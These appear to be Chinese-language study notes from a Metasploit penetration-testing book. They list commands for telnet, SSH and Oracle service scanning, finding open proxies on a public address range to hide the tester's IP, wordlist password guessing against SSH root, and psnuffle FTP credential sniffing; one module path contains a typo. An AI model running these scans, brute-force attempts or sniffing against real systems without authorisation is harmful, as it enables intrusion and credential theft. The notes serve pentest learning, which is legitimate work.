查看所有可用的服务查点模块
search name:_version
常用的网络服务扫描
telnet服务扫描
可为下一步网络嗅探或口令猜测做好准备
use auxiliary/scanner/telnet/telnet_version
set rhosts 10.10.10.0/24
set threads 100
run
可以得到开放telnet服务的主机的ip、操作系统版本,主机名
SSH服务扫描
use auxiliary/scanner/ssh/ssh_version
set rhosts 10.10.10.0/24
set threads 100
run
可得到开放ssh服务的主机的ip、ssh服务软件及版本号
Oracle服务查点
use auxiliary/scanner/oracle/tnslsnr_version
set rhosts 10.10.10.0/24
set threads 50
run
可得到开放Oracle数据库服务的主机的ip、Oracle版本号
开放代理探测与利用
利用代理服务器隐藏真实IP地址
use auxiliary/scanner/http/open_proxy
set site www.google.com
set rhosts 24.25.24.1-24.25.24.254
set multiports true
set threads 100
run
也可以在自己主机上假设OpenVPN服务
口令猜测与嗅探
SSH服务口令猜测
use auxiliary/scanner/ssh/ssh_login
set rhosts 10.10.10.254
set username root
set pass_file /root/words.txt
set threads 50
psnuffle口令嗅探
获取ftp服务的口令认证。
必须能够接入对方网络的初始访问点后才能使用。
use auxiliary/siffer/psnuffle
run
参考
《Metasploit渗透魔鬼训练营》